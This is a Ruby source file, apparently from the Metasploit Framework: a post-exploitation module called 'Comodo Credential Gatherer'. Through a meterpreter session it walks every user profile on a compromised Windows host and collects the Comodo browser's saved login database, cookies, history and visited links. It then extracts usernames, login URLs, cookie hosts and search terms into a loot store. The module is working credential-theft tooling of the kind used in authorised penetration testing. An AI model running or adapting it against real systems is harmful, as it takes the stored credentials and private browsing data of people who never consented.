1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::UserProfiles
9
  include Msf::Post::Windows::Packrat
10

11
  ARTIFACTS =
12
    {
13
      application: 'comodo',
14
      app_category: 'browsers',
15
      gatherable_artifacts: [
16
        {
17
          filetypes: 'logins',
18
          path: 'LocalAppData',
19
          dir: 'Comodo',
20
          artifact_file_name: 'Login Data',
21
          description: "Comodo's saved Username and Passwords",
22
          credential_type: 'sqlite',
23
          sql_search: [
24
            {
25
              sql_description: "Database Commands which exports Chrome's Login data",
26
              sql_table: 'logins',
27
              sql_column: 'action_url, username_value'
28
            }
29
          ]
30
        },
31
        {
32
          filetypes: 'cookies',
33
          path: 'LocalAppData',
34
          dir: 'Comodo',
35
          artifact_file_name: 'Cookies',
36
          description: "Comodo's saved cookies",
37
          credential_type: 'sqlite',
38
          sql_search: [
39
            {
40
              sql_description: "Database Commands which exports Chrome's Cookie data",
41
              sql_table: 'cookies',
42
              sql_column: 'host_key, name, path'
43
            }
44
          ]
45
        },
46
        {
47
          filetypes: 'web_history',
48
          path: 'LocalAppData',
49
          dir: 'Comodo',
50
          artifact_file_name: 'History',
51
          description: "Comodo's History",
52
          credential_type: 'sqlite',
53
          sql_search: [
54
            {
55
              sql_description: "Database Commands which exports Chrome's Login data",
56
              sql_table: 'urls',
57
              sql_column: 'url'
58
            },
59
            {
60
              sql_description: "Database Commands which exports Chrome's Login data",
61
              sql_table: 'keyword_search_terms',
62
              sql_column: 'lower_term'
63
            },
64
            {
65
              sql_description: "Database Commands which exports Chrome's Login data",
66
              sql_table: 'downloads',
67
              sql_column: 'current_path, tab_referrer_url'
68
            },
69
            {
70
              sql_description: "Database Commands which exports Chrome's Login data",
71
              sql_table: 'segments',
72
              sql_column: 'name'
73
            },
74
            {
75
              sql_description: "Database Commands which exports Chrome's Login data",
76
              sql_table: 'downloads_url_chains',
77
              sql_column: 'url'
78
            }
79
          ]
80
        },
81
        {
82
          filetypes: 'web_history',
83
          path: 'LocalAppData',
84
          dir: 'Comodo',
85
          artifact_file_name: 'Visited Links',
86
          description: "Comodo's History",
87
          credential_type: 'sqlite',
88
          sql_search: [
89
            {
90
              sql_description: "Database Commands which exports Chrome's Login data",
91
              sql_table: 'urls',
92
              sql_column: 'url'
93
            },
94
            {
95
              sql_description: "Database Commands which exports Chrome's Login data",
96
              sql_table: 'keyword_search_terms',
97
              sql_column: 'lower_term'
98
            },
99
            {
100
              sql_description: "Database Commands which exports Chrome's Login data",
101
              sql_table: 'downloads',
102
              sql_column: 'current_path, tab_referrer_url'
103
            },
104
            {
105
              sql_description: "Database Commands which exports Chrome's Login data",
106
              sql_table: 'segments',
107
              sql_column: 'name'
108
            },
109
            {
110
              sql_description: "Database Commands which exports Chrome's Login data",
111
              sql_table: 'downloads_url_chains',
112
              sql_column: 'url'
113
            }
114
          ]
115
        }
116
      ]
117
    }.freeze
118

119
  def initialize(info = {})
120
    super(
121
      update_info(
122
        info,
123
        'Name' => 'Comodo Credential Gatherer',
124
        'Description' => %q{
125
          This module searches for credentials stored in Comodo on a Windows host.
126
        },
127
        'License' => MSF_LICENSE,
128
        'Author' => [
129
          'Kazuyoshi Maruta',
130
          'Daniel Hallsworth',
131
          'Barwar Salim M',
132
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
133
        ],
134
        'Platform' => ['win'],
135
        'SessionTypes' => ['meterpreter'],
136
        'Notes' => {
137
          'Stability' => [CRASH_SAFE],
138
          'Reliability' => [],
139
          'SideEffects' => []
140
        }
141
      )
142
    )
143

144
    register_options(
145
      [
146
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
147
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
148
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
149
        # enumerates the options based on the artifacts that are defined below
150
        OptEnum.new('ARTIFACTS', [
151
          false,
152
          'Type of artifacts to collect',
153
          'All',
154
          ARTIFACTS[:gatherable_artifacts].map do |k|
155
            k[:filetypes]
156
          end.uniq.unshift('All')
157
        ])
158
      ]
159
    )
160
  end
161

162
  def run
163
    print_status('Filtering based on these selections:  ')
164
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
165
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
166
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
167

168
    # used to grab files for each user on the remote host
169
    grab_user_profiles.each do |userprofile|
170
      run_packrat(userprofile, ARTIFACTS)
171
    end
172

173
    print_status('PackRat credential sweep completed')
174
  end
175
end
176

177